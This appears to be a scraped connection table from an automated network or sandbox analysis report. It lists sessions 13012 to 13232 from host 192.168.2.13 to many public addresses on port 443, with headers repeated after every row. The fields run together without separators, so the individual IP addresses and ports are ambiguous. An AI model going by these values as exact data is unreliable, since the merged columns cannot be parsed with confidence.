                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13012192.168.2.134438013.143.156.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13013192.168.2.135684859.88.95.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13014192.168.2.134332081.98.26.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13015192.168.2.1335772209.37.249.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13016192.168.2.1356230161.205.15.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13017192.168.2.1337140116.147.189.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13018192.168.2.1336616162.240.17.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13019192.168.2.1344754115.80.98.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13020192.168.2.133572423.109.147.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13021192.168.2.13344449.18.84.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13022192.168.2.1346816166.10.241.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13023192.168.2.135337439.42.15.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13024192.168.2.135786618.173.238.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13025192.168.2.1348362148.161.34.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13026192.168.2.1355538106.2.81.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13027192.168.2.1360716137.187.71.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13028192.168.2.1341000163.22.193.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13029192.168.2.1347150114.130.227.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13030192.168.2.135240497.29.243.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13031192.168.2.134881463.137.109.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13032192.168.2.1359726189.98.104.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13033192.168.2.1348962150.22.30.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13034192.168.2.1336794223.29.117.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13035192.168.2.1338052136.24.241.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13036192.168.2.1340688210.153.223.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13037192.168.2.1351622115.55.80.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13038192.168.2.1358760158.237.230.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13039192.168.2.135615896.56.12.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13040192.168.2.1342756170.12.42.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13041192.168.2.135627285.238.244.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13042192.168.2.1355910112.118.168.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13043192.168.2.135796823.79.247.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13044192.168.2.134044489.82.209.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13045192.168.2.133959443.243.240.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13046192.168.2.1359206146.127.31.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13047192.168.2.1335244104.1.205.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13048192.168.2.1358520139.54.54.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13049192.168.2.135377823.233.201.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13050192.168.2.135810079.94.138.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13051192.168.2.134212674.89.54.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13052192.168.2.1352848150.1.114.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13053192.168.2.1341710103.85.41.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13054192.168.2.134361072.254.117.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13055192.168.2.1336864209.230.165.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13056192.168.2.1339640170.154.87.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13057192.168.2.1353176208.63.241.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13058192.168.2.133683835.23.183.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13059192.168.2.1333094140.168.254.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13060192.168.2.1349524133.47.37.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13061192.168.2.1354702145.180.215.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13062192.168.2.1359814192.212.179.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13063192.168.2.1347514151.226.81.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13064192.168.2.13560481.106.130.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13065192.168.2.1337926111.210.9.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13066192.168.2.134575625.70.161.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13067192.168.2.135714254.171.39.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13068192.168.2.1353504148.108.44.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13069192.168.2.136020241.163.116.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13070192.168.2.1333974204.145.189.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13071192.168.2.13438348.69.137.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13072192.168.2.135604254.46.132.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13073192.168.2.1334936131.94.255.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13074192.168.2.1349174202.31.120.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13075192.168.2.133968894.92.111.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13076192.168.2.1349044190.173.0.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13077192.168.2.1344894222.106.29.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13078192.168.2.1339892128.40.250.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13079192.168.2.135838036.197.104.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13080192.168.2.1351620200.6.204.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13081192.168.2.135726479.18.122.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13082192.168.2.134633444.202.102.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13083192.168.2.1344846108.253.221.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13084192.168.2.1339362195.24.171.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13085192.168.2.135280865.217.85.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13086192.168.2.133767885.142.160.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13087192.168.2.1358782200.96.221.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13088192.168.2.13486462.249.250.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13089192.168.2.1335498181.236.97.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13090192.168.2.133353475.207.44.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13091192.168.2.1343024149.251.242.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13092192.168.2.1342506167.184.77.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13093192.168.2.1351064180.32.90.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13094192.168.2.1357458177.169.234.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13095192.168.2.134032451.124.110.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13096192.168.2.1351852177.139.109.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13097192.168.2.135634436.147.149.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13098192.168.2.1345834133.207.134.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13099192.168.2.134045276.192.39.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13100192.168.2.133634073.107.142.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13101192.168.2.1357584142.242.86.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13102192.168.2.1346704194.56.189.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13103192.168.2.1350894210.200.218.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13104192.168.2.134426893.74.80.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13105192.168.2.133631666.53.96.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13106192.168.2.135567438.74.152.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13107192.168.2.134630474.210.17.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13108192.168.2.1345642166.241.132.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13109192.168.2.1343354114.166.198.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13110192.168.2.1334528158.179.72.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13111192.168.2.1333898164.215.90.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13112192.168.2.1341964103.138.138.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13113192.168.2.133762041.82.205.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13114192.168.2.1351742142.138.63.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13115192.168.2.1334382174.26.251.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13116192.168.2.1347082183.91.9.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13117192.168.2.134997481.247.210.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13118192.168.2.1349510174.147.219.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13119192.168.2.135582863.17.108.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13120192.168.2.1348348219.202.87.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13121192.168.2.135084414.216.137.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13122192.168.2.1358164157.248.180.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13123192.168.2.1334172162.128.11.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13124192.168.2.1356320170.18.169.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13125192.168.2.1340598222.58.12.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13126192.168.2.1349470207.12.182.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13127192.168.2.133477490.128.89.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13128192.168.2.1353608184.190.35.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13129192.168.2.1352690169.185.65.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13130192.168.2.134844452.37.213.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13131192.168.2.133690014.212.230.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13132192.168.2.1346528119.113.128.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13133192.168.2.1355346174.76.239.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13134192.168.2.1339726111.112.169.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13135192.168.2.1358356135.21.197.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13136192.168.2.1335440142.6.70.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13137192.168.2.1345012184.45.162.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13138192.168.2.1358272199.129.15.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13139192.168.2.1356442218.252.151.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13140192.168.2.1349456155.106.130.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13141192.168.2.1351582102.86.11.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13142192.168.2.1336466217.6.197.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13143192.168.2.135314457.52.187.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13144192.168.2.1348214145.26.186.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13145192.168.2.134349091.155.98.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13146192.168.2.1342576154.229.231.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13147192.168.2.135766087.2.250.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13148192.168.2.1356760188.37.186.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13149192.168.2.1357284188.108.250.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13150192.168.2.1347068167.77.121.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13151192.168.2.135469420.78.198.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13152192.168.2.1351248113.185.9.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13153192.168.2.133768498.192.112.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13154192.168.2.1337788149.162.59.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13155192.168.2.135770857.117.117.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13156192.168.2.13531261.225.254.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13157192.168.2.1350018185.122.251.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13158192.168.2.134464265.237.67.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13159192.168.2.1334192122.236.29.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13160192.168.2.134888251.211.65.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13161192.168.2.1346506161.24.162.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13162192.168.2.1349104211.17.160.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13163192.168.2.134799687.122.132.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13164192.168.2.1340836199.201.192.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13165192.168.2.136080013.209.68.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13166192.168.2.1360690162.60.22.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13167192.168.2.133614431.97.40.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13168192.168.2.135973020.241.222.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13169192.168.2.1346976124.162.119.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13170192.168.2.1357556187.96.169.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13171192.168.2.1336276190.88.175.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13172192.168.2.1339816180.194.225.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13173192.168.2.1347530124.200.114.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13174192.168.2.1351318119.48.190.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13175192.168.2.1340860137.95.91.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13176192.168.2.1333036156.140.75.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13177192.168.2.1352672156.167.249.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13178192.168.2.13374149.18.190.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13179192.168.2.135111671.8.188.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13180192.168.2.1354070211.187.153.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13181192.168.2.135443641.240.152.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13182192.168.2.1343964160.242.87.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13183192.168.2.135770254.37.19.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13184192.168.2.1352726178.106.66.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13185192.168.2.1346104198.52.108.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13186192.168.2.1343286106.11.188.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13187192.168.2.1339758180.68.78.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13188192.168.2.134483862.183.170.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13189192.168.2.1335770133.95.130.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13190192.168.2.135518492.124.179.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13191192.168.2.1349750134.237.222.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13192192.168.2.134498099.87.164.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13193192.168.2.1346010126.20.63.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13194192.168.2.134098880.193.19.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13195192.168.2.1348466211.23.1.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13196192.168.2.134494079.34.190.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13197192.168.2.1341032193.27.104.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13198192.168.2.134173212.168.153.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13199192.168.2.1340736211.216.246.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13200192.168.2.1338724145.253.220.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13201192.168.2.135316225.95.217.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13202192.168.2.1358372210.147.249.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13203192.168.2.1341052216.229.192.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13204192.168.2.1341406209.32.67.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13205192.168.2.1334452141.126.208.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13206192.168.2.135084069.147.245.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13207192.168.2.134858266.4.153.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13208192.168.2.1342594119.242.162.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13209192.168.2.1360892168.180.1.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13210192.168.2.1342546123.232.120.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13211192.168.2.1352088136.168.125.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13212192.168.2.1340874205.173.235.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13213192.168.2.1339856116.235.177.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13214192.168.2.133528060.188.42.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13215192.168.2.1339460162.104.6.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13216192.168.2.1354220103.87.250.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13217192.168.2.135357214.163.36.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13218192.168.2.133696483.112.191.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13219192.168.2.1337350220.213.124.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13220192.168.2.134764896.18.69.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13221192.168.2.135488232.254.71.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13222192.168.2.133290259.177.140.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13223192.168.2.1348556185.81.13.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13224192.168.2.1334078116.231.250.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13225192.168.2.1345706194.195.205.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13226192.168.2.133428699.252.115.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13227192.168.2.1339628172.94.214.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13228192.168.2.1332920208.163.196.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13229192.168.2.1360904117.189.90.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13230192.168.2.1341354170.174.128.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13231192.168.2.1344126131.72.8.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13232192.168.2.1349424159.22.5.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
